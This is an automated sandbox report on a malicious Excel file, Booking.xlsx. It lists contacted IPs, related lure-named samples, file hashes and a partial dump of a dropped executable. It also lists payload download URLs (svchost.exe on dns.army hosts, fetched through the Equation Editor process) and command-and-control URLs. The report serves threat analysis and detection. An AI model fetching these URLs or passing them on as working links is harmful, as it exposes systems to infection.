                                                                                                                                                    http://www.%s.comPAexplorer.exe, 00000007.00000002.2380506193.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    low
                                                                                                                                                    http://ariadna.elmundo.es/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.news.com.au/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.cdiscount.com/explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.tiscali.it/favicon.icoexplorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high

                                                                                                                                                          Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          103.141.138.118
                                                                                                                                                          unknownViet Nam
                                                                                                                                                          135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNfalse
                                                                                                                                                          160.153.136.3
                                                                                                                                                          unknownUnited States
                                                                                                                                                          21501GODADDY-AMSDEtrue
                                                                                                                                                          54.67.120.65
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          81.169.145.165
                                                                                                                                                          unknownGermany
                                                                                                                                                          6724STRATOSTRATOAGDEtrue

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                          Analysis ID:356846
                                                                                                                                                          Start date:23.02.2021
                                                                                                                                                          Start time:17:46:14
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 12m 33s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Sample file name:Booking.xlsx
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.expl.evad.winXLSX@11/8@6/4
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 16.4% (good quality ratio 14.9%)
                                                                                                                                                          • Quality average: 64.8%
                                                                                                                                                          • Quality standard deviation: 30.4%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                                          • Number of executed functions: 91
                                                                                                                                                          • Number of non-executed functions: 48
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found application associated with file extension: .xlsx
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          Warnings:
                                                                                                                                                          Show All
                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          17:47:14API Interceptor88x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                          17:47:18API Interceptor76x Sleep call for process: vbc.exe modified
                                                                                                                                                          17:47:42API Interceptor230x Sleep call for process: NETSTAT.EXE modified
                                                                                                                                                          17:48:18API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          103.141.138.11822-2-2021 .xlsxGet hashmaliciousBrowse
                                                                                                                                                          • thdyworkfinerainbotm.dns.army/findoc/svchost.exe
                                                                                                                                                          17-02 Requirment.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinestdyrainbost.dns.army/findoc/svchost.exe
                                                                                                                                                          New-Order Requirment.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinestdyrainbost.dns.army/findoc/svchost.exe
                                                                                                                                                          Inquiry from Pure fine food Ltd.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinestdyrainbost.dns.army/findoc/svchost.exe
                                                                                                                                                          Debtor_Statement.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinestdyrainbost.dns.army/findoc/svchost.exe
                                                                                                                                                          Order 34.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • wsdyworkfinerainbows.dns.army/receipwt/svchost.exe
                                                                                                                                                          3rd February Order Request.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinestdyrainbost.dns.army/receipwt/svchost.exe
                                                                                                                                                          Order Requirment.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinestdyrainbost.dns.army/receipwt/svchost.exe
                                                                                                                                                          Vietcong Order February.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinestdyrainbost.dns.army/receipwt/svchost.exe
                                                                                                                                                          Tyre List.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • wsdyworkfinerainbows.dns.army/receipwt/svchost.exe
                                                                                                                                                          New -PO January.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • wsdyworkfinesanothws.dns.navy/worksdoc/svchost.exe
                                                                                                                                                          IMG-CMR.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinestdysanothtp.dns.army/worksdoc/svchost.exe
                                                                                                                                                          SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • workfinewsdysanother.dns.army/worksdoc/svchost.exe
                                                                                                                                                          New Import and Export Regulation.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • stdyworkfinesanotherrainbowlomoyentstfcp.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                          160.153.136.30O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.buysellleasewithlisa.com/uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX
                                                                                                                                                          NewOrder.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • www.actranslate.com/tub0/?azuxWju=9kUE4sav2/LP9TrJDc67J8k/k24+lu0rgVtnj1PSEEeZ6JBjpW2Bsvw8EuVgnFTTtvZW5g==&0dt=YtdhwPcHS
                                                                                                                                                          22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.ondemandbarbering.com/bw82/?GZopM=kvuD_XrpiP&RFQx_=/uLN5+rz6Tt97hDEoOKXvxUOX9d2FCRa7e+MtK6cN7T3OLj7ozaH3+uXpMzRvYE3VPiI2g==
                                                                                                                                                          AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.powermindcoaching.com/idir/?jFNhC=hwkvgHy48ghmImMWzAdxmMIc2NJmaXdSmdjKS++gC1c6cUK6HyWTzvaAxwVCC50AN/AR7yL8cw==&PlHT0=_6g89p5H3xehg
                                                                                                                                                          7R29qUuJef.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.dealsonwheeeles.com/bw82/?YliL=YNoZp1cRA6SVOqyJymFogp2JCj7FMVLhyO5okn1qVTKMcBnM1o+1nt1kFwvDwcyajWVF&RX=dn9dSBwpLLodPRy
                                                                                                                                                          YSZiV5Oh2E.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.exlineinsurance.com/bw82/?-Zw=BmIsBElqWbiwomt7kqeO/+wp1eRqaF5UDtohozSbguw2D9Dle/F6SI7yp6GDrJeBiJjd&2db=X48HMfxHw
                                                                                                                                                          urgent specification request.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.outlandsolar.com/2bg/?U8PL=7TNFGO6h+cLsCe9WqKO5KavC14kfAdNf0RXsPfpEmi107dhQEjNaTQA0ociJiRXcgv2T&RfutZJ=0V0hlT
                                                                                                                                                          Shinshin Machinery.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.damsalon.com/gbr/?Jt7=pr7uWOYRsJDRipSc6LqHuFigeOgMzLOmyeKvzvM0wfiSvj5dfyV9gMbHr1N8izqMn2jS&EHO8qf=NJEx_TihIRV
                                                                                                                                                          CMahQwuvAE.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.exlineinsurance.com/bw82/?CneDg=BmIsBElqWbiwomt7kqeO/+wp1eRqaF5UDtohozSbguw2D9Dle/F6SI7yp5m57Y+54uCa&Dxlpd=2dmp
                                                                                                                                                          PO#652.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.perfectretreatswa.com/m3de/?dh0xl=h3j1g3POPHTWNx2N+jSnQO346+B5orLOTEGPtqWf6pBCWAHCTVcIhjzWzcYMkUeBNfau&BR=CvPh
                                                                                                                                                          wfEePDdnmR.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.inspirationaltraveler.com/nins/?2d8=Mz//N96d1Ihtzlso+qSNYnkQ9jNTRICMtKfPgONg/PX+ANFGqFTibYTp9iPXBB/QQDlm&BRA0vf=YV8l2Jn0
                                                                                                                                                          po.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.navedeserti.com/wtb/?DxoHn=2daDG&tdcxfR=iJn2qUWcrX+THt7ztONDVSw154pCm/e/819yFFsTHK2bt8EdJNnlyFdDUp8nT/PlIn8N
                                                                                                                                                          Details!!.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.christiandailyusa.com/t052/?Txlp=DVgTZPS8Krg0RZ&al88_FR8=prdv1VbO4ZDHQQDUocIIxOCDVaUGE+sUaaTmxsuBezDKZQ10clVSR+BHlmembIIHOWLX
                                                                                                                                                          AANK5mcsUZ.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.concordhomeevaluation.com/da0a/?EjY=dhrdFxjxtJ0&1bz=uHvI5XDJRRwa0e/jvHGHCOuwedukss94ZBLyrjL/W13bRufq2/ti6Aznlr12+W//4IHP
                                                                                                                                                          PvvkzXgMjG.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.outlandsolar.com/gzcj/?zn=JUZKXajlNXjpQYlDvuULx9hFkGkc6cgVjrKumN4gZ4Gr+v3bF1Kxf6NoT7+UFLOkUugDfVPosw==&SP=DjfD_VNP4PYp
                                                                                                                                                          tXoqs48Ta9.rtfGet hashmaliciousBrowse
                                                                                                                                                          • www.advancedcaremedical.com/c239/?XR-p=zpv5YNWkyED4aJQT1xTIqe2DeNtx0w0G3KSLnaFCQFJ0w1SlmGrhhCPhUjNVyp2kxjsvXw==&LN9xg=7nG07PO0Dbw8PFL
                                                                                                                                                          q2o0a1neTm.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.loyaloneconstruction.com/xle/?u6u4=hBWp7l4HSL7&MZQL=B5+FpCrInFWhwdy/i7r7A6LlEeg4FVV+oUpb9TtWxSwXGmzxoDeRx/BGcDAiYnFLRRy1
                                                                                                                                                          VgO6Tbd7Rx.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.abhisclub.com/rgc/
                                                                                                                                                          8nxKYwJna8.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.fixmygearfast.com/csv8/?UT=EhUhb4&OjKL3=bczMUAuRcAXUfehkBA3FaFpfgVKghqiBPuGiKAiKlgeMS/vW28KC3EFG87zxnYW1TCT6
                                                                                                                                                          PR Agreement FEB2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.dealsonwheeeles.com/bw82/?rDHt=YNoZp1cUA9SRO6+FwmFogp2JCj7FMVLhyOh44kprRzKNcwLKy4v5xpNmGWjF7tmR2whyYA==&9rbPKt=zzr4Wp8XVp9

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          thdyworkfinerainbotm.dns.army22-2-2021 .xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.118
                                                                                                                                                          ow.lyMT OCEAN STAR ISO 8217 2005.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.62.204
                                                                                                                                                          QTN3C2AF414EDF9_041873.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.57.56
                                                                                                                                                          TIC ENQ2040 FCl.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.57.56
                                                                                                                                                          MV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.57.56
                                                                                                                                                          TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.120.65
                                                                                                                                                          ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.62.204
                                                                                                                                                          BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.120.65
                                                                                                                                                          #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.57.56
                                                                                                                                                          New_Message00934.htmGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.57.56
                                                                                                                                                          https://u17588438.ct.sendgrid.net/ls/click?upn=h-2Bj1pe3h4Ysprj-2F8RRf9ChxAthv8oUCYMnydAOiqdZUW-2BWPjSW0-2FEf5GesIstZyF0TVG_lbRSzjTjAOmWKCI6GhhOife1Jj1xtmqeANf3i3jW3opERdKAfB6RW1d9S3-2BY3uAZ73G93x4NRv3SGU9GC4XSs1eCeVJJbjnXgiEyfnLUrO5zxeR-2BpWFMutEFdboHQGx95igAqkR70Vu4Hiwd9NcrDdrJs-2BOivQ93TFqP-2BT4HPMkXW0NLxBKQVPvAgnXNChoww1TXGQN2qsuqwn8GkbQaq3PqNM7QYH3v-2Fv5T56RWSqXIWExu7REiKCcAp9f6Du8yGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.120.65
                                                                                                                                                          https://u18021447.ct.sendgrid.net/ls/click?upn=4-2B97j-2BtYQoCI2fDYEybJE8VXu-2FoT5KUlTEBIP-2FZpwja1LaUJU-2BvsibdvO6vqoNKGEtLN_tkuwbiJYWhKaepE-2BM1TZDajlOQqjy023dIArdFfY4Q7aInX1fHyzMaSNgDpN4RXFFT28Nvm4lTgRP2Lo2wigkcpLbULWR3rg-2FE60qFalXBd1XauXGfqffZ3Vso2GpH8M2RIy-2BLstJ0DTX5Ex-2FSV3rlGx9ZgW98jLaWYfY9EKxp-2Bb-2FdkzvrNyt500LWgC9ORMQ0r6YfW8Y79Zk2VNJnudzlxb1CJo-2FW7Zs6eo8A-2FWgzs-3DGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.62.204
                                                                                                                                                          http://ow.ly/nDiV30mD63nGet hashmaliciousBrowse
                                                                                                                                                          • 54.183.132.164
                                                                                                                                                          http://ow.ly/Rrh750jwUFvGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.57.56
                                                                                                                                                          GTEDS.pdfGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.120.65
                                                                                                                                                          GTEDS.pdfGet hashmaliciousBrowse
                                                                                                                                                          • 54.183.130.144
                                                                                                                                                          Marine Engine Spare Parts Order_first.pdfGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.120.65
                                                                                                                                                          CCS Projects.pdfGet hashmaliciousBrowse
                                                                                                                                                          • 54.183.132.164
                                                                                                                                                          http://ow.ly/8rYF30jYWv5Get hashmaliciousBrowse
                                                                                                                                                          • 54.67.120.65
                                                                                                                                                          Locked.pdfGet hashmaliciousBrowse
                                                                                                                                                          • 54.183.131.91
                                                                                                                                                          http://ow.ly/avIT30jzSjvGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.120.65

                                                                                                                                                          ASN

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          AMAZON-02UStransferir copia_98087.exeGet hashmaliciousBrowse
                                                                                                                                                          • 18.189.205.91
                                                                                                                                                          2TEKb7PdvN.exeGet hashmaliciousBrowse
                                                                                                                                                          • 3.13.191.225
                                                                                                                                                          Complaint_Letter_1186814227-02192021.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 13.126.100.34
                                                                                                                                                          Complaint_Letter_1186814227-02192021.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 13.126.100.34
                                                                                                                                                          YFZX6dTsiT.exeGet hashmaliciousBrowse
                                                                                                                                                          • 3.22.15.135
                                                                                                                                                          xKeHI0tf38.exeGet hashmaliciousBrowse
                                                                                                                                                          • 3.13.191.225
                                                                                                                                                          seed.exeGet hashmaliciousBrowse
                                                                                                                                                          • 52.217.45.220
                                                                                                                                                          OutplayedInstaller (1).exeGet hashmaliciousBrowse
                                                                                                                                                          • 99.86.159.128
                                                                                                                                                          Facecheck - app-Installer (1).exeGet hashmaliciousBrowse
                                                                                                                                                          • 99.86.159.102
                                                                                                                                                          Buff-Installer (9).exeGet hashmaliciousBrowse
                                                                                                                                                          • 13.226.162.82
                                                                                                                                                          firefox-3.0.0.zipGet hashmaliciousBrowse
                                                                                                                                                          • 13.226.162.116
                                                                                                                                                          MT OCEAN STAR ISO 8217 2005.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.62.204
                                                                                                                                                          QTN3C2AF414EDF9_041873.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 52.57.196.177
                                                                                                                                                          TIC ENQ2040 FCl.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.57.56
                                                                                                                                                          MV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.57.56
                                                                                                                                                          TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 54.67.120.65
                                                                                                                                                          8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.192.141.1
                                                                                                                                                          R4VugGhHOo.exeGet hashmaliciousBrowse
                                                                                                                                                          • 18.197.52.125
                                                                                                                                                          RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                          • 52.58.78.16
                                                                                                                                                          ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                                                                                          • 13.57.130.120
                                                                                                                                                          VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNMT OCEAN STAR ISO 8217 2005.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 180.214.238.131
                                                                                                                                                          QTN3C2AF414EDF9_041873.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.140.251.164
                                                                                                                                                          TIC ENQ2040 FCl.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.125.191.182
                                                                                                                                                          MV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.120
                                                                                                                                                          TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.133.108.6
                                                                                                                                                          SKBMT_ 5870Z904_ Image.exeGet hashmaliciousBrowse
                                                                                                                                                          • 103.114.107.184
                                                                                                                                                          ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.99.1.149
                                                                                                                                                          FedEx Shipment 427781339903.exeGet hashmaliciousBrowse
                                                                                                                                                          • 103.151.123.132
                                                                                                                                                          BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.121
                                                                                                                                                          Our New Order Feb 23 2021 at 2.70_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 103.114.107.184
                                                                                                                                                          Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 103.114.107.184
                                                                                                                                                          Request for Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                          • 103.89.88.238
                                                                                                                                                          #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.99.1.145
                                                                                                                                                          quote.exeGet hashmaliciousBrowse
                                                                                                                                                          • 103.89.88.238
                                                                                                                                                          Our New Order Feb 22 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 103.114.107.184
                                                                                                                                                          RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.128
                                                                                                                                                          quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.140.251.164
                                                                                                                                                          notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.147.184.10
                                                                                                                                                          22-2-2021 .xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.118
                                                                                                                                                          Shipping_Document.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.141.138.119
                                                                                                                                                          GODADDY-AMSDE0O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Quotation Reques.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.133.87
                                                                                                                                                          4pFzkB6ePK.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.128.38
                                                                                                                                                          NewOrder.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          7R29qUuJef.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          YSZiV5Oh2E.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          urgent specification request.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Shinshin Machinery.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          CMahQwuvAE.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          PO#652.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Claim-1097837726-02162021.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.137.40
                                                                                                                                                          Claim-509072992-02162021.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.137.40
                                                                                                                                                          wfEePDdnmR.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          955037-012021-98_98795947.docGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.137.14
                                                                                                                                                          po.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Details!!.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          AANK5mcsUZ.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          PvvkzXgMjG.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):458240
                                                                                                                                                          Entropy (8bit):7.598110124449528
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:IU5VLxPv1XYRaFTl3corvZDruuCwgrd3P:1VlVXYUFTSorvRSww3P
                                                                                                                                                          MD5:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          SHA1:064A71647FB159152BA653654B0C02024B44DADC
                                                                                                                                                          SHA-256:78F83F782F8D2077DD50D65BADB4ED36EC24C029241287F76560E60733B61C29
                                                                                                                                                          SHA-512:3910B1B22CCCA3FFBCC22A7181ABB5330C4ADF5E0B55C67ED3B507ED55365F721F360CDEB0A302C8FA40ACD87D67EABEE54D0392589B486FC9155560B7EF9C65
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 15%
                                                                                                                                                          Reputation:low
                                                                                                                                                          IE Cache URL:http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.4`..............P.................. ... ....@.. .......................`............@.................................4...O.... ..,....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...,.... ......................@..@.reloc.......@......................@..B................h.......H...........@......n.......X............................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....og...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....+..*.0......
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56E156B3.emf
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):653280
                                                                                                                                                          Entropy (8bit):2.898618787806911
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:534UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:x4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                          MD5:296906001A7181BF226103C25DA8405D
                                                                                                                                                          SHA1:3F82C334E3AC190259DA9E13BC0903246746ECBF
                                                                                                                                                          SHA-256:744F589A7F6720BAA98F9CDC0187A18DD36658246ECFC376A7809EA3262960FF
                                                                                                                                                          SHA-512:CB280941E6D4A24D9C848771017976AFD3C9B93BEB1BBBABE0D1866A27D0486AF094729F8D57F957B0C19CE1FD299232AE6355883408587C6612B7C989906AB7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................(...(.......(...(..N.W..(...(.....h.(...(..N.W..(...(. ....y.R..(...(. ............z.R............?...............................X...%...7...................{ .@................C.a.l.i.b.r...............(.X.....(.,.(..2.Q........h.(.h.(..{.Q......(.....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\622BF639.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
